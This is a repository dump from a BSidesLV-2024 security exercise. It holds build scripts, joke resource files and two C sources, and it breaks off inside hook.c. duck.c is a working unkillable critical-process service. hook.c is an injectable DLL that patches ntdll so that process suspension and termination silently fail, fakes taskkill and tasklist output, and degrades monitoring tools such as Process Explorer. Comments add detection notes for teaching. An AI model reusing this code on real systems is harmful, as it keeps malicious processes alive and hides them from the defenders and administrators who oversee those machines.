/BSidesLV-2024/Screenshots/screenshot-35.png: -------------------------------------------------------------------------------- 1 | version 
https://git-lfs.github.com/spec/v1 2 | oid sha256:fe4a717d35cec81cdaca078ed97c26228d4090f20365af52055fe324aa42b500 3 | size 46973 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-36.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dd22608bdceae267c78df136982b771068ccac0d20cc25edbcfc62b6fddc4e59 3 | size 93871 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-4.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:68c23d66766c465022249fe0f1eaa4d72a2e1cd294f8b9552807916263b63084 3 | size 138216 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-5.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:de8cd290fa68edcd3cd0befa9ac7f4c8ce0ae84c94274e7d646496b9d2a4413f 3 | size 214152 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-6.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:9552080d32fd57e591fdc575c608029c82949cbe0a48beb4b7f5be5d65feef59 3 | size 68936 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-7.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d680f064e48efc5ab0326652afd8182dd4094d13a0e9b407a00757cdfd3e5a05 3 | size 109333 4 | -------------------------------------------------------------------------------- 
/BSidesLV-2024/Screenshots/screenshot-8.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:dac09dfd4551b2d9a9899991c953cbf6625ac4707f3cfed126178ba32cc6d9d7 3 | size 69421 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Screenshots/screenshot-9.png: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:d74ea7d49948ea33e475917901b39c858f57d2be68535c23952a607e76d48dc3 3 | size 37044 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/bitcoin.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:c6c3bd18b6ffc6157f3c4a0b42d2c901f6eb56865199313185e09b599a9fe3a0 3 | size 14942 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/bitcoin.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "bitcoin.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 69,69,69,69 22 | PRODUCTVERSION 69,69,69,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "TO THE MOON!!" 35 | VALUE "CompanyName", "Bitconnect" 36 | VALUE "FileDescription", "Quick Cash Grab" 37 | VALUE "FileVersion", "69.69.69.69" 38 | VALUE "InternalName", "BITCONNECT!!!" 39 | VALUE "LegalCopyright", "Copyright(C) 2020 Bitconnect" 40 | VALUE "OriginalFilename", "bitcoin.exe" 41 | VALUE "ProductName", "Wasup, Wasup, Wasup, BITCONNECT!!!!" 42 | VALUE "ProductVersion", "69.69.69.69" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | # Copyright (C) 2020 - 2024 iDigitalFlame 3 | # 4 | # This program is free software: you can redistribute it and/or modify 5 | # it under the terms of the GNU General Public License as published by 6 | # the Free Software Foundation, either version 3 of the License, or 7 | # any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program. If not, see . 
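#

# Build the BSidesLV-2024 support binaries (decoy services and executables)
# into ../assets with the mingw-w64 cross toolchain.
#
# Each target is: windres(NAME.rc) -> NAME-64.o, then gcc links that object,
# the shared manifest object and the C source into ../assets/NAME.exe.

set -eu

# Intermediate COFF objects live in a private mktemp directory instead of fixed
# names under the shared /tmp (no predictable-path clobbering), and the EXIT
# trap removes all of them — the original cleanup list left duck-64.o behind.
tmp="$(mktemp -d)"
trap 'rm -rf "$tmp"' EXIT

# Compiler/linker flags shared by every target (unchanged from the per-line
# invocations; -nostdlib keeps the decoys free of the CRT).
cflags=(
    -mwindows -fPIC -lkernel32 -lntdll
    -Wa,--strip-local-absolute
    -Wp,-femit-struct-debug-reduced,-O2
    -Wl,-x,-s,-nostdlib,--no-insert-timestamp
)

# rc NAME: compile NAME.rc into "$tmp/NAME-64.o".
rc() {
    x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i "$1.rc" -o "$tmp/$1-64.o"
}

# build NAME SOURCE: compile NAME's resources, then link them, the manifest
# object and SOURCE into ../assets/NAME.exe.
build() {
    rc "$1"
    x86_64-w64-mingw32-gcc "${cflags[@]}" -o "../assets/$1.exe" "$tmp/$1-64.o" "$tmp/manifest-64.o" "$2"
}

# The manifest object is shared by every executable, so it is compiled first.
rc manifest

build duck duck.c
build malware nop.c
build bitcoin nop.c
build dolphin nop_svc.c
-------------------------------------------------------------------------------- /BSidesLV-2024/Support/dolphin.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid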
sha256:f142ed78775191a4947fd53a7e0de4a7d0739bc285b4d48f47d72146fb7c8301 3 | size 41662 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/dolphin.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "dolphin.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 0,1,2,1 22 | PRODUCTVERSION 0,1,2,1 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "Trust me... im a dolphin" 35 | VALUE "CompanyName", "The Mighty Seas" 36 | VALUE "FileDescription", "Totally not a virus." 37 | VALUE "FileVersion", "0.1.2.1" 38 | VALUE "InternalName", "Dolphin" 39 | VALUE "LegalCopyright", "wut" 40 | VALUE "OriginalFilename", "dolphin.exe" 41 | VALUE "ProductName", "Totally not a virus. Trust me... 
im a dolphin" 42 | VALUE "ProductVersion", "0.1.2.1" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
//

// duck.c - the "Duck" Windows service from the BSidesLV-2024 exercise.
//
// On start the service enables SeDebugPrivilege on its own token, marks itself
// a critical process (ProcessBreakOnTermination = 1, which per duck.md crashes
// Windows if the process dies) and tells the SCM that it accepts
// SERVICE_CONTROL_SHUTDOWN only, so it cannot be stopped. On shutdown it puts the
// previous critical-process value back before reporting SERVICE_STOPPED.
//
// Detection angle: a non-system service enabling SeDebugPrivilege and then
// calling NtSetInformationProcess(ProcessBreakOnTermination) on itself is the
// observable behaviour; duck.md in this directory walks through the same code.

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

// Strip windows.h down to what this file uses.
#define NOWH
#define NOMB
#define NOMSG
#define NONLS
#define NOMCX
#define NOIME
#define NOHELP
#define NOCOMM
#define NOICONS
#define NOCRYPT
#define NOKANJI
#define NOSOUND
#define NOCOLOR
#define NOMENUS
#define NOCTLMGR
#define NOMINMAX
#define NOSCROLL
#define NODRAWTEXT
#define NOMETAFILE
#define NOPROFILER
#define NOKEYSTATES
#define NORASTEROPS
#define NOCLIPBOARD
#define NOWINSTYLES
#define NOSYSMETRICS
#define NOWINOFFSETS
#define NOSHOWWINDOW
#define NOTEXTMETRIC
#define NOSYSCOMMANDS
#define NOGDICAPMASKS
#define NOWINMESSAGES
#define NODEFERWINDOWPOS
#define NOVIRTUALKEYCODES
#define WIN32_LEAN_AND_MEAN

// NOTE(review): the header names were lost in this rendering of the file.
#include
#include

// Signatures of the ntdll exports resolved at runtime in DuckSetup.
typedef NTSTATUS(WINAPI *funcNtAdjustTokenPrivileges)(
    HANDLE TokenHandle,
    BOOLEAN DisableAllPrivileges,
    PTOKEN_PRIVILEGES NewState,
    ULONG BufferLength,
    PTOKEN_PRIVILEGES PreviousState,
    PULONG ReturnLength);
typedef NTSTATUS(WINAPI *funcNtSetInformationProcess)(
    HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength);
typedef NTSTATUS(WINAPI *funcNtQueryInformationProcess)(
    HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength,
    PULONG ReturnLength);

// last: ProcessBreakOnTermination value read in DuckSetup before it is changed,
//       restored by DuckDisable.
// stopper: manual-reset event signalled by the control handler on shutdown.
// duck: status handle returned by RegisterServiceCtrlHandlerExW.
DWORD last;
HANDLE stopper;
SERVICE_STATUS_HANDLE duck;

VOID DuckSetup();
VOID DuckDisable();
BOOL DuckDebug(HANDLE, DWORD);

VOID WINAPI DuckStatus(DWORD);
VOID WINAPI DuckService(DWORD, LPWSTR *);

HMODULE ntdll;
funcNtAdjustTokenPrivileges fNtAdjustTokenPrivileges;
funcNtSetInformationProcess fNtSetInformationProcess;

// Entry point: hands the process to the SCM dispatcher with DuckService as the
// only service entry (empty name, i.e. a SERVICE_WIN32_OWN_PROCESS service).
int main(int argc, char *argv[]) {
    SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}};
    StartServiceCtrlDispatcherW(t);
    return 0;
}

// DuckDebug sets the attributes of SeDebugPrivilege (LUID 0x14) on token t to
// s (0x2 = SE_PRIVILEGE_ENABLED, 0 = disabled) via the resolved
// NtAdjustPrivilegesToken pointer. Returns TRUE only when the native call
// returns 0 (STATUS_SUCCESS), FALSE otherwise or when the pointer was never
// resolved.
//
// NOTE(review): this closes t on every call, but both callers (DuckSetup and
// DuckDisable) pass the same handle twice, and DuckDisable closes it a third
// time at its end — every close after the first operates on an already-closed
// handle, so the "disable" call works on an invalid token.
// NOTE(review): 0x7C is passed as BufferLength although PreviousState is NULL;
// presumably a leftover — confirm nothing relies on it.
BOOL DuckDebug(HANDLE t, DWORD s) {
    if (fNtAdjustTokenPrivileges == NULL) {
        return FALSE;
    }
    TOKEN_PRIVILEGES p;
    p.PrivilegeCount = 1;
    p.Privileges[0].Attributes = s;
    p.Privileges[0].Luid.HighPart = 0;
    p.Privileges[0].Luid.LowPart = 0x14; // SE_DEBUG_PRIVILEGE
    DWORD u = 0;
    NTSTATUS r = fNtAdjustTokenPrivileges(t, FALSE, &p, 0x7C, NULL, &u);
    CloseHandle(t);
    if (r == 0) {
        return TRUE;
    }
    return FALSE;
}

// DuckSetup resolves the ntdll exports, enables SeDebugPrivilege on the
// current process token, records the current ProcessBreakOnTermination value
// in `last`, sets it to 1 (critical process) and disables the privilege again.
// Every failure is silent: the function simply returns and the service keeps
// running without the critical flag.
VOID DuckSetup() {
    ntdll = LoadLibraryW(L"ntdll.dll");
    if (ntdll == NULL) {
        return;
    }
    // The export is named NtAdjustPrivilegesToken; the typedef above uses the
    // Win32-style word order.
    fNtAdjustTokenPrivileges = (funcNtAdjustTokenPrivileges)GetProcAddress(ntdll, "NtAdjustPrivilegesToken");
    fNtSetInformationProcess = (funcNtSetInformationProcess)GetProcAddress(ntdll, "NtSetInformationProcess");
    funcNtQueryInformationProcess fNtQuery = (funcNtQueryInformationProcess)GetProcAddress(ntdll, "NtQueryInformationProcess");
    if (fNtQuery == NULL || fNtAdjustTokenPrivileges == NULL || fNtSetInformationProcess == NULL) {
        return;
    }
    HANDLE t;
    // 0x200E8 - TOKEN_READ (STANDARD_RIGHTS_READ | TOKEN_QUERY) | TOKEN_WRITE
    // (TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS |
    // TOKEN_ADJUST_DEFAULT)
    if (OpenProcessToken(GetCurrentProcess(), 0x200E8, &t) == 0) {
        return;
    }
    // 0x2 - SE_PRIVILEGE_ENABLED
    if (DuckDebug(t, 0x2)) {
        // 0x1D - ProcessBreakOnTermination
        DWORD r = 0;
        // NOTE(review): NTSTATUS failure codes are negative, so `> 0` only
        // catches informational/warning statuses; a failed query falls
        // through with `last` still 0 — confirm whether `!= 0` was intended.
        if (fNtQuery(GetCurrentProcess(), 0x1D, &last, 0x4, &r) > 0) {
            return;
        }
        DWORD v = 1;
        fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &v, 0x4);
        // 0x0 - SE_PRIVILEGE_DISABLED
        // NOTE(review): t was already closed inside the DuckDebug call above.
        DuckDebug(t, 0);
    }
    return;
}
// DuckDisable restores the ProcessBreakOnTermination value saved in `last`,
// but only when that value was 0 — if the process was already critical before
// DuckSetup ran, it is left alone. Uses the same privilege enable/disable
// sequence as DuckSetup.
//
// NOTE(review): as in DuckSetup, t is closed by the first DuckDebug call, then
// passed to DuckDebug again and closed once more at the end of this function.
VOID DuckDisable() {
    if (last > 0) {
        return;
    }
    HANDLE t;
    // 0x200E8 - TOKEN_READ (STANDARD_RIGHTS_READ | TOKEN_QUERY) | TOKEN_WRITE
    // (TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS |
    // TOKEN_ADJUST_DEFAULT)
    if (OpenProcessToken(GetCurrentProcess(), 0x200E8, &t) == 0) {
        return;
    }
    // 0x2 - SE_PRIVILEGE_ENABLED
    if (DuckDebug(t, 0x2)) {
        // 0x1D - ProcessBreakOnTermination
        fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &last, 0x4);
        // 0x0 - SE_PRIVILEGE_DISABLED
        DuckDebug(t, 0);
    }
    CloseHandle(t);
    return;
}

// DuckUpdate is the HandlerEx callback registered in DuckService.
//   c - control code; v, d, x - event type/data/context, unused here.
// SERVICE_CONTROL_STOP is deliberately ignored; SERVICE_CONTROL_SHUTDOWN
// reports SERVICE_STOP_PENDING (0x3) and signals `stopper` so DuckService can
// finish; any other code just re-reports SERVICE_RUNNING (0x4).
DWORD WINAPI DuckUpdate(DWORD c, DWORD v, void *d, void *x) {
    switch (c) {
    case SERVICE_CONTROL_STOP:
        // No stopping
        break;
    case SERVICE_CONTROL_SHUTDOWN:
        DuckStatus(0x3);
        SetEvent(stopper);
        break;
    default:
        DuckStatus(0x4);
        break;
    }
    return 0;
}

// DuckStatus reports state s to the SCM. The SERVICE_STATUS fields are, in
// order: service type 0x10 (SERVICE_WIN32_OWN_PROCESS), current state s,
// controls accepted 0x4 (SERVICE_ACCEPT_SHUTDOWN only — no STOP), then
// Win32 exit code, service exit code, checkpoint and wait hint all 0.
VOID WINAPI DuckStatus(DWORD s) {
    // Only set that we reply to SERVICE_CONTROL_SHUTDOWN
    SERVICE_STATUS v = {0x10, s, 0x4, 0, 0, 0, 0};
    SetServiceStatus(duck, &v);
}
// DuckService is the ServiceMain: registers DuckUpdate under the name
// "DuckService", applies DuckSetup while START_PENDING, then blocks on
// `stopper` until the shutdown control arrives, undoes the critical flag,
// releases ntdll (balancing the LoadLibraryW in DuckSetup) and reports
// SERVICE_STOPPED.
//
// NOTE(review): the RegisterServiceCtrlHandlerExW result is not checked; if it
// fails, `duck` stays NULL and every SetServiceStatus call below fails.
VOID WINAPI DuckService(DWORD argc, LPWSTR *argv) {
    duck = RegisterServiceCtrlHandlerExW(L"DuckService", &DuckUpdate, NULL);
    DuckStatus(0x2); // SERVICE_START_PENDING
    DuckSetup();
    stopper = CreateEventW(NULL, TRUE, FALSE, NULL);
    DuckStatus(0x4); // SERVICE_RUNNING
    WaitForSingleObject(stopper, INFINITE);
    DuckStatus(0x3); // SERVICE_STOP_PENDING
    DuckDisable();
    if (ntdll != NULL) {
        FreeLibrary(ntdll);
    }
    CloseHandle(stopper);
    DuckStatus(0x1); // SERVICE_STOPPED
}
-------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid
sha256:3ab397eb09908257cfd417760fcac5974975fafbb59cb3effbec8d0d7a19ff78 3 | size 38078 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "duck.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 4,5,6,69 22 | PRODUCTVERSION 4,5,6,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "*quack*" 35 | VALUE "CompanyName", "The Pond, LLC" 36 | VALUE "FileDescription", "Uhhh... I'm a duck!" 37 | VALUE "FileVersion", "4.5.6.69" 38 | VALUE "InternalName", "Duck!" 
39 | VALUE "LegalCopyright", "Copyright(C) 1920 WaterFowl" 40 | VALUE "OriginalFilename", "duck.exe" 41 | VALUE "ProductName", "Duck Service, Very Important" 42 | VALUE "ProductVersion", "4.5.6.69" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/hook.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
//

// hook.c - in-process DLL from the BSidesLV-2024 exercise.
//
// Once loaded into a process it: (1) refuses to load into the system processes
// in targetsB; (2) replaces taskkill.exe / tasklist.exe output with fake
// results and exits; (3) lowers the integrity label of known monitoring tools
// (targetsA, or a "Process Hacker" FileDescription); and (4) inline-patches the
// first five bytes of ntdll's NtSuspendProcess — and, in the processes picked
// by IsHookTerminate, NtSuspendThread and NtTerminateProcess — to jump into a
// trampoline written into nearby padding, so those calls silently succeed
// without acting on other processes.
//
// Detection angle: the hooked exports start with an E9 jmp into a padding cave
// of the same module, and the touched pages are left PAGE_EXECUTE_READWRITE;
// comparing in-memory ntdll text with the on-disk image, or scanning for RWX
// pages inside image mappings, surfaces both.

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

// Strip windows.h down to what this file uses.
#define NOWH
#define NOMB
#define NOGDI
#define NOMSG
#define NONLS
#define NOMCX
#define NOIME
#define NOHELP
#define NOCOMM
#define NOICONS
#define NOCRYPT
#define NOKANJI
#define NOSOUND
#define NOCOLOR
#define NOMENUS
#define NOCTLMGR
#define NOMINMAX
#define NOSCROLL
#define NODRAWTEXT
#define NOMETAFILE
#define NOPROFILER
#define NOKEYSTATES
#define NORASTEROPS
#define NOCLIPBOARD
#define NOWINSTYLES
#define NOSYSMETRICS
#define NOWINOFFSETS
#define NOSHOWWINDOW
#define NOTEXTMETRIC
#define NOSYSCOMMANDS
#define NOGDICAPMASKS
#define NOWINMESSAGES
#define NODEFERWINDOWPOS
#define NOVIRTUALKEYCODES
#define WIN32_LEAN_AND_MEAN

#define UNICODE
#define EXPORT __declspec(dllexport)

// NOTE(review): the header names were lost in this rendering of the file.
#include
#include
#include
#include
#include
#include
#include
#include
#include

// Sizes of the four name tables below.
#define SIZE_A 10
#define SIZE_B 17
#define SIZE_C 2
#define SIZE_D 1
// Bytes overwritten at the start of a hooked export (E9 rel32).
#define SIZE_JUMP 5
// Bytes of the trampoline written into the padding cave.
// #define SIZE_PATCH 19
#define SIZE_PATCH 14

// One inline hook: the patched export address, the original bytes (restored by
// Undo) and the 5-byte jmp (re-applied by Redo), guarded by a per-hook mutex.
typedef struct hook {
    HANDLE mutex;
    LPVOID target;
    unsigned char orig[SIZE_JUMP];
    unsigned char patch[SIZE_JUMP];
} hook;
// One entry of the VS_VERSIONINFO "\VarFileInfo\Translation" array.
typedef struct LANG {
    WORD wLanguage;
    WORD wCodePage;
} LANG_INFO;
typedef long long ptr;
typedef NTSTATUS(NTAPI *funcNtTerminateProcess)(HANDLE, NTSTATUS);

// Intended to serialise writes to the shared `jump` buffer in Hook.
// NOTE(review): nothing in this file ever creates this mutex, so
// WaitForSingleObject(NULL, ...) fails immediately and the guard is
// ineffective — confirm it is not initialised elsewhere.
HANDLE mutexGlobal;

// Trampoline template: nop; movabs r11, imm64; push r11; ret. Hook overwrites
// bytes 3..10 with the replacement function's address before writing it out.
unsigned char jump[SIZE_PATCH] = {
    0x90, // nop
    0x49, 0xBB, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // movabs r11,
    0x41, 0x53, // push r11
    0xC3, // ret
};

/* Older version
unsigned char jump[SIZE_PATCH] = {
    0x90, // nop
    0x49, 0x89, 0xC3, // mv r11,rax
    0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax,
    0x50, // push rax
    0x49, 0x8B, 0xC3, // mv rax,r11
    0xC3, // ret
};
*/

// targetsA: image names treated as untrusted (monitoring tools); matched as a
// case-insensitive suffix of the host's module path by IsProcName.
const char *targetsA[SIZE_A] = {
    "taskmgr.exe\0",
    "procexp.exe\0",
    "tcpview.exe\0",
    "procmon.exe\0",
    "procmon86.exe\0",
    "procmon32.exe\0",
    "procexp64.exe\0",
    "procexpx64.exe\0",
    "processhacker.exe\0",
    "processhacker2.exe\0",
};
// targetsB: processes the DLL refuses to stay loaded in (DllMain returns
// FALSE) and that are never classified as untrusted.
const char *targetsB[SIZE_B] = {
    "slui.exe\0",
    "lsass.exe\0",
    "wermgr.exe\0",
    "spoolsv.exe\0",
    "svchost.exe\0",
    "DLLHost.exe\0",
    "LogonUI.exe\0",
    "regedit.exe\0",
    "consent.exe\0",
    "explorer.exe\0",
    "iexplore.exe\0",
    "rundll32.exe\0",
    "werfault.exe\0",
    "winlogon.exe\0",
    "taskhost.exe\0",
    "taskhostex.exe\0",
    "ServerManager.exe\0"};
// targetsC: additional processes that get the NtSuspendThread and
// NtTerminateProcess hooks on top of NtSuspendProcess.
const char *targetsC[SIZE_C] = {
    "taskmgr.exe\0",
    "powershell.exe\0"};
// targetsD: FileDescription strings that mark a process as untrusted when its
// name is not in targetsA.
const char *targetsD[SIZE_D] = {
    "Process Hacker\0"};

hook NtSuspendThreadHook;
hook NtSuspendProcessHook;
hook NtTerminateProcessHook;

// Real NtTerminateProcess, resolved in DllMain and called from the replacement.
funcNtTerminateProcess NtTerminateProcess;

NTSTATUS NTAPI NtSuspendProcessFunc(HANDLE);
NTSTATUS NTAPI NtSuspendThreadFunc(HANDLE, PULONG);
NTSTATUS NTAPI NtTerminateProcessFunc(HANDLE, NTSTATUS);

int IsExclude(int, WCHAR[MAX_PATH]);
int IsProcName(int, WCHAR *, int, const char *);

// DoUntrust runs on its own thread (started from DllMain) 500 ms after attach.
// It opens the process token, builds well-known SID type 0x41 (presumably
// WinUntrustedLabelSid — confirm) and installs it as the token's integrity
// label (class 0x19 / TokenIntegrityLevel, attribute 0x20 / SE_GROUP_INTEGRITY),
// dropping the process's own integrity level.
//
// NOTE(review): declared DWORD but falls off the end without a return value.
// NOTE(review): `a` is a single SID struct but 32 bytes are advertised to
// CreateWellKnownSid; an S-1-16-x label SID is 12 bytes so it fits, but the
// size claim exceeds the buffer. SetTokenInformation's result is ignored.
DWORD DoUntrust(void) {
    Sleep(500);
    HANDLE t;
    if (!OpenProcessToken(GetCurrentProcess(), 0x200A8, &t)) {
        return 0;
    }
    SID a;
    DWORD c = 32;
    if (!CreateWellKnownSid(0x41, NULL, &a, &c)) {
        CloseHandle(t);
        return 0;
    }
    SID_AND_ATTRIBUTES b;
    b.Sid = &a;
    b.Attributes = 0x20;
    SetTokenInformation(t, 0x19, &b, c + 4);
    CloseHandle(t);
}

// IsProcByVersion reads the version resource of the image at path s and returns
// TRUE when the FileDescription of any translation ends with one of the
// targetsD strings; FALSE on any failure or no match.
//
// NOTE(review): the inner loop indexes targetsD with `i` (the translation
// index) instead of `k`; with SIZE_D == 1 any image carrying a second
// translation entry reads past the end of targetsD.
int IsProcByVersion(WCHAR s[MAX_PATH]) {
    DWORD n = GetFileVersionInfoSizeW(s, 0);
    if (n == 0) {
        return FALSE;
    }
    LPVOID b = (LPVOID)calloc(n, 1);
    if (b == NULL) {
        return FALSE;
    }
    if (!GetFileVersionInfoW(s, 0, n, b)) {
        free(b);
        return FALSE;
    }
    UINT c;
    LANG_INFO *l;
    if (!VerQueryValueW(b, L"\\VarFileInfo\\Translation", (LPVOID *)&l, &c)) {
        free(b);
        return FALSE;
    }
    UINT x;
    WCHAR *d;
    WCHAR v[255];
    // One FileDescription lookup per language/code-page pair.
    for (int i = 0; i < (c / sizeof(LANG_INFO)); i++) {
        if (FAILED(StringCchPrintfW(v, 255, L"\\StringFileInfo\\%04x%04x\\FileDescription", l[i].wLanguage, l[i].wCodePage))) {
            continue;
        }
        if (!VerQueryValueW(b, v, (LPVOID *)&d, &x) || x == 0) {
            continue;
        }
        // x - 1 presumably excludes the terminating NUL from the length — confirm.
        for (int k = 0; k < SIZE_D; k++) {
            if (IsProcName(x - 1, d, strlen(targetsD[i]), targetsD[i])) {
                free(b);
                return TRUE;
            }
        }
    }
    free(b);
    return FALSE;
}
// IsUntrust: TRUE when the host image (path s, length sn) matches targetsA, or
// — unless it is an excluded system process — matches a targetsD
// FileDescription.
int IsUntrust(int sn, WCHAR s[MAX_PATH]) {
    for (int i = 0; i < SIZE_A; i++) {
        if (IsProcName(sn, s, strlen(targetsA[i]), targetsA[i])) {
            return TRUE;
        }
    }
    if (IsExclude(sn, s)) {
        return FALSE;
    }
    return IsProcByVersion(s);
}
// IsExclude: TRUE when the host image matches a targetsB name.
int IsExclude(int sn, WCHAR s[MAX_PATH]) {
    for (int i = 0; i < SIZE_B; i++) {
        if (IsProcName(sn, s, strlen(targetsB[i]), targetsB[i])) {
            return TRUE;
        }
    }
    return FALSE;
}
// IsHookTerminate: TRUE when the host is untrusted or matches targetsC, i.e.
// when the suspend-thread and terminate hooks should also be installed.
